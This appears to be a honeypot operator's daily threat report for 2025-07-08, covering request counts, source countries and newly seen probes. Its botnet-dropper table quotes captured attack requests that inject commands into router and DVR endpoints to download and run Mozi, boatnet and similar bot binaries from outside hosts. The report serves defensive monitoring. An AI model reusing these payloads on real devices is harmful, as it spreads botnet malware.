Daily Report: 2025-07-08#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 13 stage 1 IP address(es), linked to 6 dropper URL(s).
There are 20 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1519 requests were recorded during the day, originating from 13 different countries, with a peak of 817 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
41.226.204.243 | GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1 |
8.216.94.115 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.163.107 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.172.182 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
36.255.5.48 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
144.172.115.127 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.7%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
8.215.192.72 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.212.69 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
66.63.179.126 | GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.8.33 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.131.91 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
144.172.115.127 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.86%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
45.135.194.11 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
358 | 1 | GET /nmaplowercheck1751968022 HTTP/1.1 |
359 | 1 | GET /gPNW HTTP/1.1 |
374 | 1 | GET /Nmap/folder/check1751968022 HTTP/1.1 |
379 | 1 | GET /NmapUpperCheck1751968022 HTTP/1.1 |
428 | 1 | \x00\x0E8\xFC\x10\xB5*/NCZ\x00\x00\x00\x00\x00 |
581 | 1 | GET /var/www/html/phpinfo.php HTTP/1.1 |
586 | 1 | GET /api/.env/api/.env HTTP/1.1 |
595 | 1 | GET /var/www/ HTTP/1.1 |
598 | 1 | GET /.docker/ HTTP/1.1 |
599 | 1 | GET /.github/ HTTP/1.1 |
604 | 1 | GET /config/ HTTP/1.1 |
607 | 1 | GET /.aws/credentials/login/ HTTP/1.1 |
611 | 1 | GET /api/ HTTP/1.1 |
627 | 1 | GET /phpversion HTTP/1.1 |
630 | 1 | GET /debugger.php HTTP/1.1 |
637 | 1 | GET /index.php?info HTTP/1.1 |
644 | 1 | GET /diagnostics.php HTTP/1.1 |
678 | 1 | GET /data/ HTTP/1.1 |
685 | 1 | \x00\x0E8\x086\xBCvlNJ\xBA\x00\x00\x00\x00\x00 |
756 | 1 | \x00\x0E8\xD8t\xD2,*\x00\xDB;\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 817 | US |
1 | 138 | CN |
2 | 119 | SE |
3 | 101 | NL |
4 | 53 | GB |
5 | 46 | IR |
6 | 38 | SC |
7 | 28 | DE |
8 | 28 | JP |
9 | 19 | PL |
10 | 16 | IN |
11 | 13 | SG |
12 | 11 | BG |
13 | 11 | AU |
14 | 10 | CA |
15 | 9 | RU |
16 | 9 | HK |
17 | 7 | GH |
18 | 5 | ZA |
19 | 4 | BE |
20 | 4 | BR |
21 | 3 | KR |
22 | 3 | LT |
23 | 3 | KZ |
24 | 3 | MU |
25 | 2 | IL |
26 | 2 | MM |
27 | 2 | AT |
28 | 2 | TH |
29 | 2 | IE |
30 | 1 | AR |
31 | 1 | VN |
32 | 1 | TN |
33 | 1 | ID |
34 | 1 | ES |
35 | 1 | GE |
36 | 1 | KH |
37 | 1 | JE |
38 | 1 | AE |
39 | 1 | UA |
40 | 1 | EE |